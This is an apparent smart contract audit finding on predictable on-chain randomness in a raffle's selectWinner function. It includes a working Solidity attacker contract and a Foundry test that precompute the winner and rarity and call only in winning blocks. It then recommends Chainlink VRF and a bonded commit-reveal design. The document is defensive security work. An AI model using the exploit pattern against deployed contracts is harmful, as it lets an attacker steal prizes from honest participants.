The selectWinner function in the given smart contract attempts to pick a winner from a raffle and award them an NFT with a rarity level. The randomness used to determine both the winner and the rarity of the NFT can be predicted or manipulated because it relies on block variables and msg.sender, potentially allowing a malicious actor to unfairly win and obtain a Legendary NFT.
The function applies the keccak256 hash function to a combination of msg.sender, block.timestamp, and block.difficulty to compute the winner index and the rarity value. None of these inputs is secret: all three are readable by any contract executing in the same transaction, so a caller can compute the outcome before deciding whether to call selectWinner at all. The caller also controls msg.sender (for example by routing the call through a contract it deployed), a block proposer can skew block.timestamp within the permitted drift, and block.difficulty (an alias for block.prevrandao since the Merge) is known to the proposer before the block is built. These sources of entropy are therefore manipulable to some extent:
Winner Selection:
Rarity Determination:
The winnerIndex and rarity values are derived from the keccak256 hash function, which, although a secure hash function, yields predictable output when fed with known or manipulable inputs. Furthermore, we also know that the rarity value needs to be > 95 in order to mint the legendary NFT, so an attacker only has to wait for (or craft) a call in which the precomputed rarity exceeds 95 and the precomputed winnerIndex points at their own entry.
A malicious actor could potentially manipulate the variables involved in the randomness generation to increase their chances of winning the raffle and obtaining a Legendary NFT. This undermines the fairness and integrity of the raffle and NFT distribution, which could in turn affect the trust and participation levels in the raffle.
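The following is an added illustration, not code from the audited contract or the original finding. It reproduces the pattern the finding describes in a hypothetical Raffle contract (the contract, member and function names are assumptions), adds an attacker contract that recomputes the same hash inside its own transaction and only calls selectWinner when the precomputed result is a win with rarity > 95, and wraps both in a Foundry test that simulates successive blocks. It assumes forge-std and a post-Merge EVM target, where vm.prevrandao sets the value that block.difficulty reads.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

// Hypothetical raffle reproducing the pattern in the finding; contract and member names
// are assumptions, not the audited contract's code.
contract Raffle {
    address[] public players;
    address public winner;
    bool public legendary;

    function enter() external {
        players.push(msg.sender);
    }

    function playersLength() external view returns (uint256) {
        return players.length;
    }

    // Both values derive from public, in-block data. block.difficulty aliases
    // block.prevrandao after the Merge and is already known to the block proposer.
    function selectWinner() external {
        require(players.length > 0, "no players");
        uint256 h = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty)));
        winner = players[h % players.length];
        legendary = (h % 100) > 95;
    }
}

// The attacker is a contract so that msg.sender inside selectWinner is a value it controls.
// It recomputes the hash in the same transaction and proceeds only on a favourable outcome;
// otherwise it reverts cheaply and tries again in a later block.
contract Attacker {
    Raffle public immutable raffle;

    constructor(Raffle r) {
        raffle = r;
    }

    function enter() external {
        raffle.enter();
    }

    function predictedOutcome() public view returns (bool wins, bool isLegendary) {
        uint256 h = uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty)));
        wins = raffle.players(h % raffle.playersLength()) == address(this);
        isLegendary = (h % 100) > 95;
    }

    function attack() external {
        (bool wins, bool isLegendary) = predictedOutcome();
        require(wins && isLegendary, "unfavourable block, retry later");
        raffle.selectWinner();
    }
}

contract RaffleExploitTest is Test {
    Raffle raffle;
    Attacker attacker;

    function setUp() public {
        raffle = new Raffle();
        // Three honest entrants with constructed addresses, plus the attacker contract.
        vm.prank(address(0x1111)); raffle.enter();
        vm.prank(address(0x2222)); raffle.enter();
        vm.prank(address(0x3333)); raffle.enter();
        attacker = new Attacker(raffle);
        attacker.enter();
    }

    function testAttackerWinsLegendaryByWaitingForFavourableBlock() public {
        bool found;
        // Simulate successive blocks; the attacker acts only when the precomputed
        // outcome is a win with rarity > 95 (roughly 1 block in 100 with 4 players).
        for (uint256 i = 1; i <= 5000 && !found; i++) {
            vm.warp(1_700_000_000 + 12 * i);
            vm.prevrandao(bytes32(i));
            (bool wins, bool isLegendary) = attacker.predictedOutcome();
            if (wins && isLegendary) {
                attacker.attack();
                found = true;
            }
        }
        assertTrue(found, "no favourable block in search window");
        assertEq(raffle.winner(), address(attacker));
        assertTrue(raffle.legendary());
    }
}
```

The attacker never needs to influence the block: it is enough that every input is public at call time, so it can test the outcome for free and submit the real call only when it wins. A colluding proposer has even more leverage, since it chooses the timestamp and knows prevrandao in advance.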
Add this test function to the foundry test:
Manual review
Foundry
Employ Off-chain Randomness: Utilize an off-chain source of randomness, like Chainlink VRF (Verifiable Random Function), to generate random numbers securely.
Use Commit-Reveal Scheme: Implement a commit-reveal scheme that requires players to submit a hash of their chosen random number and reveal it later; the revealed values are then combined to generate the random number for the raffle. Bond the reveal or exclude non-revealers from the draw, since otherwise the last player to reveal learns the outcome before deciding whether to reveal at all.
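As an added example of the commit-reveal recommendation (not the audited contract's code and not part of the original finding), the contract below takes a fixed bond with each commitment, mixes every revealed secret into a seed, refunds the bond on a valid reveal, and draws the winner and rarity only among players who revealed. The contract name, bond size, reveal window and operator role are assumptions chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Hypothetical commit-reveal raffle (illustration only). BOND, REVEAL_WINDOW and the
// single-operator close step are assumptions.
contract CommitRevealRaffle {
    enum Phase { Commit, Reveal, Done }

    uint256 public constant BOND = 0.01 ether;   // forfeited by players who commit but never reveal
    uint256 public constant REVEAL_WINDOW = 1 days;

    address public immutable operator;
    Phase public phase;
    uint256 public revealDeadline;

    address[] public players;
    mapping(address => bytes32) public commitments;
    mapping(address => bool) public revealed;
    address[] public revealers;
    bytes32 private seed;   // "private" only hides it from Solidity; it is readable on-chain

    address public winner;
    bool public legendary;

    constructor() {
        operator = msg.sender;
    }

    // Helper for players: the commitment binds the player's address so that one
    // player cannot replay another player's commitment.
    function commitmentFor(address player, uint256 secret) external pure returns (bytes32) {
        return keccak256(abi.encodePacked(player, secret));
    }

    // Step 1: publish H(player, secret) while the secret stays private.
    function commit(bytes32 commitment) external payable {
        require(phase == Phase.Commit, "not commit phase");
        require(msg.value == BOND, "bond required");
        require(commitments[msg.sender] == bytes32(0), "already committed");
        commitments[msg.sender] = commitment;
        players.push(msg.sender);
    }

    // Step 2: close entries. No secret can be chosen after this point.
    function closeCommits() external {
        require(msg.sender == operator, "not operator");
        require(phase == Phase.Commit, "not commit phase");
        phase = Phase.Reveal;
        revealDeadline = block.timestamp + REVEAL_WINDOW;
    }

    // Step 3: reveal within the window; each valid secret is mixed into the seed and
    // the bond is refunded. State is updated before the refund call (checks-effects-interactions).
    function reveal(uint256 secret) external {
        require(phase == Phase.Reveal && block.timestamp <= revealDeadline, "not reveal phase");
        require(!revealed[msg.sender], "already revealed");
        require(keccak256(abi.encodePacked(msg.sender, secret)) == commitments[msg.sender], "bad reveal");
        revealed[msg.sender] = true;
        revealers.push(msg.sender);
        seed = keccak256(abi.encodePacked(seed, secret));
        (bool ok, ) = msg.sender.call{value: BOND}("");
        require(ok, "refund failed");
    }

    // Step 4: after the window, derive winner and rarity from the combined seed only.
    // Only revealers are eligible, so withholding a secret costs both the bond and the entry.
    // Forfeited bonds stay in the contract; sweeping them is left out of this illustration.
    function selectWinner() external {
        require(phase == Phase.Reveal && block.timestamp > revealDeadline, "reveal window open");
        require(revealers.length > 0, "nobody revealed");
        phase = Phase.Done;
        uint256 h = uint256(keccak256(abi.encodePacked(seed, "winner")));
        winner = revealers[h % revealers.length];
        uint256 rarity = uint256(keccak256(abi.encodePacked(seed, "rarity"))) % 100;
        legendary = rarity > 95;
    }
}
```

The residual weakness is the last-revealer bias: the final player to reveal can compute the seed with and without their secret and choose to forfeit the bond if withholding gives a better draw. The bond must therefore exceed the value of a Legendary NFT for this to be economically sound; where that is impractical, an off-chain verifiable source such as Chainlink VRF is the simpler choice.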
Root cause: bad RNG. Impact: manipulate winner.